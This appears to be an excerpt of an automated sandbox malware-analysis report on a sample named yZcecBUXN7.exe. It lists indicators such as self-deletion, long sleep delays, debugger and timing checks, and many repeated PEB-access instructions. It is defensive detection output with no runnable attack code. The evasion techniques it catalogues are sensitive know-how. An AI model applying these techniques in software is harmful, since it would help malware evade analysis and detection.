            Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: yZcecBUXN7.exe Static PE information: 0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
            Source: yZcecBUXN7.exe Static PE information: section name: .text entropy: 7.633926656601929

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\netsh.exeFile deleted: c:\users\user\desktop\yzcecbuxn7.exeJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: yZcecBUXN7.exe PID: 6640, type: MEMORYSTR
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory allocated: CC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory allocated: 2A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Memory allocated: 4A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0114096E rdtsc 1_2_0114096E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00401D30 sldt word ptr [eax] 1_2_00401D30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 1723
            Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 8248
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netsh.exe API coverage: 2.3 %
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe TID: 6744 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep count: 1723 > 30
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep time: -3446000s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep count: 8248 > 30
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716 Thread sleep time: -16496000s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep count: 31 > 30
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep time: -46500s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep count: 37 > 30
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724 Thread sleep time: -37000s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose, 4_2_00C1B710
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123417601.000000000127F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2314438483.000001B1F3C9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_004172C3 LdrLoadDll, 1_2_004172C3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AA118 mov ecx, dword ptr fs:[00000030h] 1_2_011AA118
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]1_2_0112E53E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]1_2_0112E53E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108550 mov eax, dword ptr fs:[00000030h]1_2_01108550
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108550 mov eax, dword ptr fs:[00000030h]1_2_01108550
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]1_2_0113656A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]1_2_0113656A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]1_2_0113656A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E59C mov eax, dword ptr fs:[00000030h]1_2_0113E59C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102582 mov eax, dword ptr fs:[00000030h]1_2_01102582
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102582 mov ecx, dword ptr fs:[00000030h]1_2_01102582
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01134588 mov eax, dword ptr fs:[00000030h]1_2_01134588
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h]1_2_011245B1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h]1_2_011245B1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]1_2_011805A7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]1_2_011805A7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]1_2_011805A7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011065D0 mov eax, dword ptr fs:[00000030h]1_2_011065D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h]1_2_0113A5D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h]1_2_0113A5D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h]1_2_0113E5CF
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h]1_2_0113E5CF
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011025E0 mov eax, dword ptr fs:[00000030h]1_2_011025E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]1_2_0112E5E7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h]1_2_0113C5ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h]1_2_0113C5ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]1_2_01138402
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]1_2_01138402
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]1_2_01138402
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC427 mov eax, dword ptr fs:[00000030h]1_2_010FC427
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h]1_2_010FE420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h]1_2_010FE420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h]1_2_010FE420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]1_2_01186420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]1_2_01186420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]1_2_01186420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]1_2_01186420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]1_2_01186420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]1_2_01186420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]1_2_01186420
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112245A mov eax, dword ptr fs:[00000030h]1_2_0112245A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA456 mov eax, dword ptr fs:[00000030h]1_2_011BA456
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]1_2_0113E443
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F645D mov eax, dword ptr fs:[00000030h]1_2_010F645D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h]1_2_0112A470
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h]1_2_0112A470
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h]1_2_0112A470
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C460 mov ecx, dword ptr fs:[00000030h]1_2_0118C460
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA49A mov eax, dword ptr fs:[00000030h]1_2_011BA49A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011344B0 mov ecx, dword ptr fs:[00000030h]1_2_011344B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118A4B0 mov eax, dword ptr fs:[00000030h]1_2_0118A4B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011064AB mov eax, dword ptr fs:[00000030h]1_2_011064AB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011004E5 mov ecx, dword ptr fs:[00000030h]1_2_011004E5
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100710 mov eax, dword ptr fs:[00000030h]1_2_01100710
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130710 mov eax, dword ptr fs:[00000030h]1_2_01130710
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C700 mov eax, dword ptr fs:[00000030h]1_2_0113C700
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117C730 mov eax, dword ptr fs:[00000030h]1_2_0117C730
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113273C mov eax, dword ptr fs:[00000030h]1_2_0113273C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113273C mov ecx, dword ptr fs:[00000030h]1_2_0113273C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113273C mov eax, dword ptr fs:[00000030h]1_2_0113273C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C720 mov eax, dword ptr fs:[00000030h]1_2_0113C720
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C720 mov eax, dword ptr fs:[00000030h]1_2_0113C720
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100750 mov eax, dword ptr fs:[00000030h]1_2_01100750
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142750 mov eax, dword ptr fs:[00000030h]1_2_01142750
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142750 mov eax, dword ptr fs:[00000030h]1_2_01142750
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E75D mov eax, dword ptr fs:[00000030h]1_2_0118E75D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01184755 mov eax, dword ptr fs:[00000030h]1_2_01184755
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113674D mov esi, dword ptr fs:[00000030h]1_2_0113674D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113674D mov eax, dword ptr fs:[00000030h]1_2_0113674D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113674D mov eax, dword ptr fs:[00000030h]1_2_0113674D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108770 mov eax, dword ptr fs:[00000030h]1_2_01108770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A678E mov eax, dword ptr fs:[00000030h]1_2_011A678E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B47A0 mov eax, dword ptr fs:[00000030h]1_2_011B47A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011007AF mov eax, dword ptr fs:[00000030h]1_2_011007AF
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110C7C0 mov eax, dword ptr fs:[00000030h]1_2_0110C7C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011807C3 mov eax, dword ptr fs:[00000030h]1_2_011807C3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011047FB mov eax, dword ptr fs:[00000030h]1_2_011047FB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011047FB mov eax, dword ptr fs:[00000030h]1_2_011047FB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E7E1 mov eax, dword ptr fs:[00000030h]1_2_0118E7E1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011227ED mov eax, dword ptr fs:[00000030h]1_2_011227ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011227ED mov eax, dword ptr fs:[00000030h]1_2_011227ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011227ED mov eax, dword ptr fs:[00000030h]1_2_011227ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142619 mov eax, dword ptr fs:[00000030h]1_2_01142619
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]1_2_0111260B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]1_2_0111260B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]1_2_0111260B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]1_2_0111260B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]1_2_0111260B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]1_2_0111260B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]1_2_0111260B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E609 mov eax, dword ptr fs:[00000030h]1_2_0117E609
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01136620 mov eax, dword ptr fs:[00000030h]1_2_01136620
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138620 mov eax, dword ptr fs:[00000030h]1_2_01138620
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E627 mov eax, dword ptr fs:[00000030h]1_2_0111E627
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110262C mov eax, dword ptr fs:[00000030h]1_2_0110262C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111C640 mov eax, dword ptr fs:[00000030h]1_2_0111C640
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01132674 mov eax, dword ptr fs:[00000030h]1_2_01132674
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C866E mov eax, dword ptr fs:[00000030h]1_2_011C866E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C866E mov eax, dword ptr fs:[00000030h]1_2_011C866E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A660 mov eax, dword ptr fs:[00000030h]1_2_0113A660
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A660 mov eax, dword ptr fs:[00000030h]1_2_0113A660
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104690 mov eax, dword ptr fs:[00000030h]1_2_01104690
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104690 mov eax, dword ptr fs:[00000030h]1_2_01104690
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011366B0 mov eax, dword ptr fs:[00000030h]1_2_011366B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C6A6 mov eax, dword ptr fs:[00000030h]1_2_0113C6A6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0113A6C7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A6C7 mov eax, dword ptr fs:[00000030h]1_2_0113A6C7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]1_2_0117E6F2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]1_2_0117E6F2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]1_2_0117E6F2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E6F2 mov eax, dword ptr fs:[00000030h]1_2_0117E6F2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011806F1 mov eax, dword ptr fs:[00000030h]1_2_011806F1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011806F1 mov eax, dword ptr fs:[00000030h]1_2_011806F1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C912 mov eax, dword ptr fs:[00000030h]1_2_0118C912
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8918 mov eax, dword ptr fs:[00000030h]1_2_010F8918
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8918 mov eax, dword ptr fs:[00000030h]1_2_010F8918
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E908 mov eax, dword ptr fs:[00000030h]1_2_0117E908
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E908 mov eax, dword ptr fs:[00000030h]1_2_0117E908
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118892A mov eax, dword ptr fs:[00000030h]1_2_0118892A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0119892B mov eax, dword ptr fs:[00000030h]1_2_0119892B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4940 mov eax, dword ptr fs:[00000030h]1_2_011D4940
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180946 mov eax, dword ptr fs:[00000030h]1_2_01180946
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4978 mov eax, dword ptr fs:[00000030h]1_2_011A4978
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4978 mov eax, dword ptr fs:[00000030h]1_2_011A4978
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C97C mov eax, dword ptr fs:[00000030h]1_2_0118C97C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01126962 mov eax, dword ptr fs:[00000030h]1_2_01126962
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01126962 mov eax, dword ptr fs:[00000030h]1_2_01126962
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01126962 mov eax, dword ptr fs:[00000030h]1_2_01126962
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E mov eax, dword ptr fs:[00000030h]1_2_0114096E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E mov edx, dword ptr fs:[00000030h]1_2_0114096E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E mov eax, dword ptr fs:[00000030h]1_2_0114096E
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011889B3 mov esi, dword ptr fs:[00000030h]1_2_011889B3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011889B3 mov eax, dword ptr fs:[00000030h]1_2_011889B3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011889B3 mov eax, dword ptr fs:[00000030h]1_2_011889B3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0 mov eax, dword ptr fs:[00000030h]1_2_011129A0
